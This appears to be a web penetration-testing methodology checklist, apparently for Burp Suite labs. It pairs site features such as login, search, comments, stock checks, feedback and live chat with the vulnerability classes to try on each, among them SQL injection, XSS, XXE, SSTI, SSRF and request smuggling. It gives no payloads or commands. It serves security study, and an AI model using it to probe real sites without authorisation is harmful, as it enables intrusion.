Methodology
What are the functionalities?
a) Authentication
Auth attacks (Intruder):
Response differences
Enumerating valid accounts
Time-based indicators
OAuth:
Study the flow
Look for vulnerabilities
Password reset:
Exploit server using the Host header
Additional headers
Host header injection bypasses
b) Search function / Advanced search
XSS: May be linked to CSRF
SQLi: Less common in basic searches, more frequent in advanced search features
c) Viewing blog posts
LFI: If only viewing posts is allowed, look for requests that include files and attempt to traverse the file path
d) Commenting on blog posts
XSS: In the comment text, website field, or other user inputs
File upload: If file uploads are possible
e) Category filter
SQLi: In the
?category=
parameter
f) Check stock function
XXE: Depending on the data input method, even with POST requests containing data and parameters
XSS: There may be XSS vectors
SQLi: Often linked to XML
g) Update e-mail
CSRF: Analyze cookies for CSRF protections
h) Submit feedback
OS Command Injection: Commonly found in the email parameter
i) View details function, or other visible templates
SSTI: Use DOM Invader to identify potential vectors
j) API calls, JavaScript files pointing to APIs, POST with JSONs
IDOR: Modifying the returned data
API vulnerabilities
GraphQL vulnerabilities: Learn to work with GraphQL using Burp Suite to ease the analysis
k) Live chat
XSS: Injecting JavaScript code, manipulating the handshake
CSRF
2. Missing functionalities?
Cookies, JWT, serialized objects
Cache response headers and poisoning
SSRF: Using Referer or other headers (e.g.,
X-Forwarded-Host
)Tracking cookie, blind SQLi
HTTP request smuggling: Use the HTTP Request Smuggler extension — a must-have
DOM-based, reflected input: Use DOM Invader with Burp Browser
Access Control headers: Check CORS
CSRF: In various forms
Last updated